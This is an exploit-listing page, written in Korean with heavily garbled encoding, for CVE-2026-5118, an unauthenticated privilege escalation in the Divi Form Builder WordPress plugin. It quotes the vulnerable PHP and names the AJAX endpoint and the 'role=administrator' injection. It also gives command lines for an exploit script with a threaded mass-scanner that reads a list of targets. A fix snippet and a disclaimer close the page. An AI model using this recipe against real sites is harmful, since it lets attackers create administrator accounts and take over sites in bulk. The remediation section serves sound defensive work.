Sploitus

Exploit for CVE-2026-5118

kitploit Β· 2026-08-25

Exploit Code

MARKDOWN122 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-YUCAERIN-CVE-2026-5118
# CVE-2026-5118 β€” Divi Form Builder <= 5.1.2 β€” μΈμ¦λ˜μ§€ μ•Šμ€ μ—­ν•  μ£Όμž…μ„ ν†΅ν•œ κΆŒν•œ μƒμŠΉ

πŸ”₯ **취약점 μš”μ•½**

WordPress ν”ŒλŸ¬κ·ΈμΈ **Divi Form Builder** 버전 **< = 5.1.2**λŠ” **μΈμ¦λ˜μ§€ μ•Šμ€ κΆŒν•œ μƒμŠΉ** 취약점에 μ·¨μ•½ν•©λ‹ˆλ‹€. 이 μ‹¬κ°ν•œ κ²°ν•¨μœΌλ‘œ 인해 **μΈμ¦λ˜μ§€ μ•Šμ€ 곡격자** κ°€ 문의 양식, 견적 양식, λ‰΄μŠ€λ ˆν„° 양식 λ˜λŠ” 기타 DFB 지원 양식을 ν¬ν•¨ν•œ λͺ¨λ“  Divi Form Builder 양식을 톡해 직접 **κ΄€λ¦¬μž** 계정을 생성할 수 μžˆμŠ΅λ‹ˆλ‹€.

취약점은 `FormSubmissionHandler.php` 파일의 `create_user()` ν•¨μˆ˜μ—μ„œ λΉ„λ‘―λ©λ‹ˆλ‹€. 이 ν•¨μˆ˜λŠ” μ μ ˆν•œ 인증 λ˜λŠ” ν—ˆμš© λͺ©λ‘ 검증 없이 μ‚¬μš©μžκ°€ μ œμΆœν•œ POST λ°μ΄ν„°μ—μ„œ `role` λ§€κ°œλ³€μˆ˜λ₯Ό 직접 μˆ˜λ½ν•©λ‹ˆλ‹€. ν”ŒλŸ¬κ·ΈμΈμ€ 제좜된 역할이 μ‹œμŠ€ν…œμ— **μ‘΄μž¬ν•˜λŠ”μ§€** 만 ν™•μΈν•©λ‹ˆλ‹€(예: `administrator`λŠ” μœ νš¨ν•œ WordPress μ—­ν• ). 곡개 등둝에 **μ•ˆμ „ν•œ** μ—­ν• μΈμ§€λŠ” μ ˆλŒ€ ν™•μΈν•˜μ§€ μ•ŠμŠ΅λ‹ˆλ‹€.

**획기적인 발견:** Divi Form Builderμ—μ„œ μ‚¬μš©ν•˜λŠ” `fb_nonce`λŠ” **μ „μ—­ 곡유 nonce**(`wp_create_nonce('security')`)둜, μ‚¬μ΄νŠΈμ˜ λͺ¨λ“  μ–‘μ‹μ—μ„œ λ™μΌν•©λ‹ˆλ‹€. λ˜ν•œ `form_type=register`λŠ” 곡유 AJAX ν•Έλ“€λŸ¬λ‘œ **POSTλ₯Ό 톡해 μž¬μ •μ˜** 될 수 μžˆμŠ΅λ‹ˆλ‹€. 즉, λͺ¨λ“  DFB 양식(문의, 견적, ν”Όλ“œλ°± λ“±)을 λ¬΄κΈ°ν™”ν•˜μ—¬ μž„μ˜μ˜ μ—­ν•  ν• λ‹ΉμœΌλ‘œ μ‚¬μš©μž 등둝을 νŠΈλ¦¬κ±°ν•  수 μžˆμŠ΅λ‹ˆλ‹€.

πŸ” **영ν–₯λ°›λŠ” ν”ŒλŸ¬κ·ΈμΈ**

  * **ν”ŒλŸ¬κ·ΈμΈ 이름:** Divi Form Builder
  * **영ν–₯λ°›λŠ” 버전:** <= 5.1.2
  * **취약점 μœ ν˜•:** μ—­ν•  μ£Όμž…μ„ ν†΅ν•œ μΈμ¦λ˜μ§€ μ•Šμ€ κΆŒν•œ μƒμŠΉ
  * **CVE ID:** CVE-2026-5118
  * **CVSS 점수:** 9.8 (심각)
  * **CWE:** CWE-266 β€” 잘λͺ»λœ κΆŒν•œ ν• λ‹Ή
  * **영ν–₯:** 전체 μ‚¬μ΄νŠΈ μž₯μ•… β€” κ΄€λ¦¬μž 계정 생성



🧨 **κ³΅κ²©μžκ°€ ν•  수 μžˆλŠ” 일**

πŸ§ͺ **μ΅μŠ€ν”Œλ‘œμž‡ κΈ°λŠ₯**

  * πŸ”“ **인증 λΆˆν•„μš”**
  * πŸ“ **λͺ¨λ“  DFB 양식을 톡해 μž‘λ™** β€” 문의, 견적, λ‰΄μŠ€λ ˆν„°, ν”Όλ“œλ°± λ“±
  * 🎯 **AJAX μ—”λ“œν¬μΈνŠΈ λŒ€μƒ** `/wp-admin/admin-ajax.php?action=de_fb_ajax_submit_ajax_handler`
  * 🧠 **μ—­ν•  μ£Όμž…** β€” 일반 양식 ν•„λ“œμ™€ ν•¨κ»˜ `role=administrator` 전솑
  * 🌐 **λŒ€λŸ‰ μŠ€μΊ” 지원** β€” μžλ™ 검색이 ν¬ν•¨λœ μŠ€λ ˆλ“œ 닀쀑 λŒ€μƒ μŠ€μΊλ„ˆ
  * πŸ“„ **κ²°κ³Ό μ €μž₯ μœ„μΉ˜** `result.txt`



🧠 **μ·¨μ•½ν•œ μ½”λ“œ**

root@kitploit:~
    
    
    // includes/shared/handlers/FormSubmissionHandler.php ~ line 2250
    $role = isset($form_data['role']) ? sanitize_text_field($form_data['role']) : 'subscriber';
    
    // ~ line 2278 β€” ONLY checks if role EXISTS, not if it is SAFE
    $roles_obj = function_exists('wp_roles') ? wp_roles() : null;
    if ($roles_obj && is_object($roles_obj) && is_array($roles_obj->roles) && !isset($roles_obj->roles[$role])) {
        $role = 'subscriber';  // ← "administrator" EXISTS, so this check PASSES
    }
    
    // ~ line 2301 β€” Directly applies the injected role
    $user = new WP_User($user_id);
    $user->set_role($role);  // ← PRIVILEGE ESCALATION!
    

πŸš€ **μ‚¬μš©λ²•**

### 단일 λŒ€μƒ

root@kitploit:~
    
    
    python3 exploit.py -t http://target.com
    python3 exploit.py -t https://target.com -u hacker -p Pass123! -e some-email@example.com
    

### λŒ€λŸ‰ μŠ€μΊ” (http/https 없이 λͺ©λ‘ μ‚¬μš©)

`targets.txt` 파일 생성:

root@kitploit:~
    
    
    target1.com
    target2.com:8080
    192.168.1.50
    subdomain.target.com
    

root@kitploit:~
    
    
    python3 exploit.py -l targets.txt -T 20
    

### μ˜΅μ…˜

πŸ›  **μˆ˜μ • ꢌμž₯ 사항**

root@kitploit:~
    
    
    // SECURE: Allowlist only safe roles for public registration
    $allowed_registration_roles = array('subscriber', 'contributor');
    if (!in_array($role, $allowed_registration_roles, true)) {
        $role = 'subscriber';  // ← Reject ALL dangerous roles
    }
    

  * ν”„λ‘ νŠΈμ—”λ“œ μ–‘μ‹μ—μ„œ `role` μˆ¨κΉ€ μž…λ ₯을 μ™„μ „νžˆ μ œκ±°ν•˜μ„Έμš”.
  * κΆŒν•œ μžˆλŠ” 역할에 λŒ€ν•΄ `current_user_can('create_users')` κΈ°λŠ₯ 검사λ₯Ό μΆ”κ°€ν•˜μ„Έμš”.
  * μ „μ—­ nonce λŒ€μ‹  μ–‘μ‹λ³„λ‘œ λ²”μœ„κ°€ μ§€μ •λœ μ—„κ²©ν•œ nonce 검증을 κ΅¬ν˜„ν•˜μ„Έμš”.
  * 등둝 AJAX μ—”λ“œν¬μΈνŠΈμ— 속도 μ œν•œμ„ μΆ”κ°€ν•˜μ„Έμš”.



🧠 **μ—°κ΅¬μž**

  * ν¬λ ˆλ”§: 0xd4rk5id3



πŸ“š **μ°Έκ³  자료**

  * Wordfence 곡지
  * 원본 CVE μ €μž₯μ†Œ



πŸ”’ **λ©΄μ±… μ‘°ν•­:**

이 μ •λ³΄λŠ” **ꡐ윑** 및 **곡인된 침투 ν…ŒμŠ€νŠΈ** λͺ©μ μœΌλ‘œλ§Œ μ œκ³΅λ©λ‹ˆλ‹€. ν—ˆκ°€ 없이 컴퓨터 μ‹œμŠ€ν…œμ„ μ•…μš©ν•˜λŠ” 것은 λΆˆλ²•μ΄λ©° λΉ„μœ€λ¦¬μ μž…λ‹ˆλ‹€. μ†Œμœ ν•˜μ§€ μ•Šμ€ λŒ€μƒμ— λŒ€ν•΄ ν…ŒμŠ€νŠΈν•˜κΈ° 전에 항상 λͺ…μ‹œμ μΈ μ„œλ©΄ ν—ˆκ°€λ₯Ό λ°›μœΌμ‹­μ‹œμ˜€.